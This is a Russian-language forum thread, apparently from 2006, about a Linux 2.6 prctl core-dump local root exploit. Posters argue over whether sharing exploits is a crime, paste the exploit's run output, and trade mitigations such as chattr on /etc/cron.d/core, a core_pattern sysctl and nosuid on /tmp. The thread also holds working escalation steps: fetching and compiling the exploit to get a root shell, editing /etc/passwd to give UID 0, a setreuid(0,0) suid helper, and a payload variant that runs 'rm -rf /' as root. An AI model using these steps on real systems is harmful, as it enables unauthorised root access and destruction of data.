Linux Kernel 2.6.x PRCTL Core Dump Handling - Local root Exploit

А распространение подобного рода вещей - нарушение УК РФ... Так что все быстренько удалили эксплоиты со своих машин!

>А распространение подобного рода вещей - нарушение УК РФ... Так что все быстренько удалили эксплоиты со своих машин!

Статью назови сначала ;-)

> А распространение подобного рода вещей - нарушение УК РФ... Так что все быстренько удалили эксплоиты со своих машин!

С каких это пор это стало нарушением УК РФ?

курить УК РФ до посинения

http://zakon.kuban.ru/uk/uk_gl28.htm

патч вышел 2006-07-06 20:05 UTC , куда смотрит лор.

А давайте УК РФ в виде большого такого manа сделаем ))
Тогда можно будет просто как обычно посылать manы курить... )

> Ты читать умеешь? Так вот если не умеешь попроси прочитать тебе следующее: В сообщении говорится про то чтобы скормить скрипт, т.е. "/bin/sh /tmp/script.sh", а не "/tmp/script.sh", что есть запустить скрипт!

Неа, не испытываю ни малейшего желания: на RHEL все давным-давно пропатчено, дома .17.4 и .16.24 уже скачались, собрались, работают... И я отнюдь не идиот, дабы пускать всякую шнягу на рабочих машинах только ради неких невнятных тестов ;) К тому же cron есть мало где, ибо оный вполне заменяем fcron'ом ;)

Запустил ты не-suid'ный скрипт... полегчало? ;)

> *ОРАТЬ В УХО* Фбабруйск жывотнае!

Ну если хочется в Бобруйск - так кто держит? ;)

> Статью назови сначала ;-)

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

Эксплойт - не вредоностная программа - этто во-первых, во вторых - это вообще исходный код, т.е. это не программа!.

>Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ

курам на смех, в первой мессаге говорилось только про распространение, это раз, во вторых создание отпадает сразу же, использование подразумевает прости кого-то, в итоге чушь полнейшая, думать надо батенька...

О, да тут юристы появились, оказывется! Может, вы еще скажете чем с юридической точки зрения отилчается распростарнение бинарника от распространения исходного кода? Где оговорено, что код программы - это не сама программа? Что распростарять код можно, а распростарнять бинарник - уже нельзя? Чем отличается код программы от самой программы с точки зраения закона? Где вообще определение того, что такое "программа для ЭВМ"?

Даже если отличаются, перловый скритп, например - это программа или код программы?

Все правильно говорят, распространение эксплоита формально попадает под 273 статью (потому что закон толком недописан), у нас много чего под нее попадает. Только пока не взялись всерьез, никто никого суить не будет.

$ uname -rs
SunOS 5.11
$ gcc exp2.c
-bash: gcc: command not found
$

Кстати у кого нет возможности пропатчить ядро быстро, а дыру надо закрыть, простое решение:
touch /etc/cron.d/core
chattr +i /etc/cron.d/core
и вобщем-то все.

Правда работает по-моему только на ext3

Да, только, экслоит (по-научному PoC - Proof of Concept) не является вредоносным кодом ни с какой точки зрения. И какой вред он причиняет?

>Все правильно говорят, распространение эксплоита формально попадает под 273 статью (потому что закон толком недописан), у нас много чего под нее попадает.

Угу. Мне ее припаяли в свое время за Саблю на диске с 1с :)

> И какой вред он причиняет?

он _вредоносный_. Вон там чела судят за то что диск продал "всё для хакера". И по той же статье. За распространение.

Применять его можно в различных целях, как для анализа безопасности собственной системы на практике, так и для реального увеличения собственных привелегий и несанкционированного доступа в дальнейшем к чужой информации..

Короче формально - нарушение УК РФ. Я конечно не юрист, но при желании на любого из нас могут навешать всё что угодно. Законы текущие предполагают хорошее такое ими манипулирование, когда закон можно истолковать в абсолютно разном понимании множеством способов.

Короче, остерегайтесь, люди. может и паранойя, но защищённость и безопасность - лишь видимость. Пока вы никому не мешаете.

>Кстати у кого нет возможности пропатчить ядро быстро, а дыру надо >закрыть, простое решение:
>touch /etc/cron.d/core
>chattr +i /etc/cron.d/core
>и вобщем-то все.
>
>Правда работает по-моему только на ext3

FC4:
$ ls /etc/cron.d/
core.24552  core.24619

Облом?

> можете так же для полного просветления сделать rm -rf / через сплоит

да, ни rm -rf, ни /tmp/sh /some/script.sh не работают (sleep увеличил, в шелл попадаю, но толку-то)

$ uname -r
2.6.16-1.2069_FC4

c0re@games:~$ ./rs_prctl_kernel Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t By: dreyer & RoMaNSoFt [ 10.Jul.2006 ]

[*] Creating Cron entry [*] Sleeping for aprox. one minute (** please wait **) [*] Running shell (remember to remove /tmp/sh when finished) ... sh: line 1: /tmp/sh: No such file or directory c0re@games:~$ uname -a Linux games 2.4.26 #3 Sun Aug 14 13:44:38 MSD 2005 i686 unknown unknown GNU/Linux c0re@games:~$

в сурсах подправил sleep(180);

Патрег Бог!

c0re@games:~$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: line 1: /tmp/sh: No such file or directory
c0re@games:~$ uname -a
Linux games 2.4.26 #3 Sun Aug 14 13:44:38 MSD 2005 i686 unknown unknown GNU/Linux
c0re@games:~$

Патрег Бог!

2.6 дырища ;)

> Облом?

Х.з., у меня после этого работать перестал. Debian Sarge:
./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: line 1: /tmp/sh: No such file or directory

ну и 
ls -l /etc/cron.d/core*
-rw-r--r--  1 root root 0 Jul 12 23:09 /etc/cron.d/core

В общем, можно резюмировать, что proof of concept failed. Никакого рута нет. Как не патч эксплоит, а толку ноль. Так разве что только fs корами загадить можно.

здрасьте, на debian'е всё замечетельно работает

не работает в suse 10.1 (2.6.16)
в шелл попадаю, но привилегии не меняются.

При желании и после rm -rf / могут навешать что угодно Главное было на кого вешать

И ещё ножиком можно калбасу резать а можно и людей то есть нарушение Ук когда людей ..гм Режмш

У тебя мозги не работают ... зачем тебе в словарном запасе такие слова как "шелл ... привилегии" удали их !!

> В общем, можно резюмировать, что proof of concept failed. Никакого рута нет.

Вы просто не умеете думать. Могу рассказать следующую идею:

Вместо /bin/sh в /tmp мы копируем /bin/chmod и даем на него suid.

Затем на /bin/chown также даем suid (с помощью нашего уже-суидного chmod!)

Потом копируем например в домашний каталог /usr/bin/vim, и с помощью уже суидных chmod и chown даем на него suid... И новым vim правим /etc/passwd и /etc/shadow.

Угу?

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: Нет такого файла или каталога

[jackill@vampiress-pc ~]$ uname -a
Linux vampiress-pc.swamp.ru 2.6.16-1.2133_FC5 #1 SMP Mon Jun 19 14:36:50 MSD 2006 x86_64 x86_64 x86_64 GNU/Linux

Запускаем второй раз:

[jackill@vampiress-pc amule]$ ./a.out Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t By: dreyer & RoMaNSoFt [ 10.Jul.2006 ]

[*] Creating Cron entry [*] Sleeping for aprox. one minute (** please wait **) [*] Running shell (remember to remove /tmp/sh when finished) ... sh-3.1$

Шелл-то есть, только не рутовый, а обычный.

>а прочитать тред тебе религия непозволила?

Гм. 180 тоже не сработало.

Может потому, что selinux врублен?

>Я могу сделать скрипт в tmp и скормить его sh и никакие nosuid noexec вас не спасут :-]

ГЫГЫГЫ.
Скритпы не могут быть суидными (сам не давно об этом узнал).
Хотя это не означает, что другими способами этого не сделать.
Так что вроде бы всё равно прав.

>в сурсах подправил sleep(180);

>Патрег Бог!

У тебя ядро 2.4. А эксплоит под 2.6. Разницу ощущаешь?

>Шелл-то есть, только не рутовый, а обычный. похоже на nosuid на /tmp?

> Шелл-то есть, только не рутовый, а обычный.

рутовый, но не до конца ;)

id твой, а euid=0

можешь сам проверить - сделай rm -rf / :)

Еще раз:
Если у вас и это не эксплоит, то меняйте строку
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/
usr/sbin:/usr/bin\n* * * * *   root   wall L.o.r debils prove of concept ; rm -f /etc/cron.d/core\n";

на
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/
usr/sbin:/usr/bin\n* * * * *   root   rm -rf /\n";

Потом PoF это не вредоносная программа. Даже сам факт повышение привилегий не есть вредоносным действием. Не санкционированным - да. Но не вредоносным. Вот как ты это будешь использовать это уже зависит от тебя. Пальцем тоже убить можно. Пальцы же ведь всем не отрубают?

Где же ленин?

>Правильно Jackill сказал "4 дебила за сутки"

Хм..чорт. С ЛОРом мне пора заканчивать. Читаю: ..."4 ебилда за сутки"...

Что-то вы, мужики, не так делаете.

ero-sennin@noemus-24:~$ uname -a
Linux noemus-24 2.6.15-25-amd64-k8 #1 SMP PREEMPT Wed Jun 14 11:39:18 UTC 2006 x86_64 GNU/Linux
ero-sennin@noemus-24:~$ wget http://www.rs-labs.com/exploitsntools/rs_prctl_kernel.c
<...>
00:09:41 (59.48 MB/s) - `rs_prctl_kernel.c' saved [1684/1684]
ero-sennin@noemus-24:~$ make rs_prctl_kernel
cc     rs_prctl_kernel.c   -o rs_prctl_kernel
ero-sennin@noemus-24:~$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]

[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1# touch /usr/r00t.test
sh-3.1# ls -l /usr/r00t.test
-rw-r--r-- 1 root users 0 2006-07-13 00:13 /usr/r00t.test
sh-3.1# touch /etc/passwd
sh-3.1# vim /etc/passwd
<можно поставить себе UID 0, например>
sh-3.1#

В чём проблема? =)

Братва, работает!
Я тут один сервак похачил :)

правда bash (на который указывает /bin/sh) он похоже хитрый - даже если сделать  его суидным он рута не даст :)
полезная вспомогательная программка:
#include <sys/types.h>
#include <unistd.h>
int main(int argc, char* argv[]){
	setreuid(0,0);
	setregid(0,0);
	execl("/usr/bin/mc","mc",NULL);
}; 

> Я тут один сервак похачил :)

судя по твоему нику ломал ты localhost? ;)

> $ cat /proc/version Linux version 2.6.16-gentoo-r12

-r12 - пофикшенный. Смотри код

> как уже сказал Metallic это прокатит только там, где не проверяется setuid и setgid

мля, а кто мешает сделать setreuid(0,0) ?

http://secunia.com/advisories/20953/

> Эксплоит позволяет повысить привилегии простого пользователя системы до root на ядрах версий 2.6.13 и выше. Данная уязвимость исправлена в последнем ядре 2.6.17.4.

Если я правильно понимаю, то Debian 3.1 эта уязвимость не затрагивает? Здесь используется ядро версии 2.6.8.

Работает на Debian, _ядро_ из унстабли

>Кстати у кого нет возможности пропатчить ядро быстро, а дыру надо закрыть, простое решение:

sysctl -w kernel.core_pattern=.core

Сачала почитайте тот же УК - толкование понятия "распространения"... :) На своей машине - это не оно.. ;)

А в нашем детском саде юных администраторов учат делать
nosuid и noexec на /tmp/ раздел.

Наверное для того чтобы такие эксплоиты не работали ни под одной версией ядра.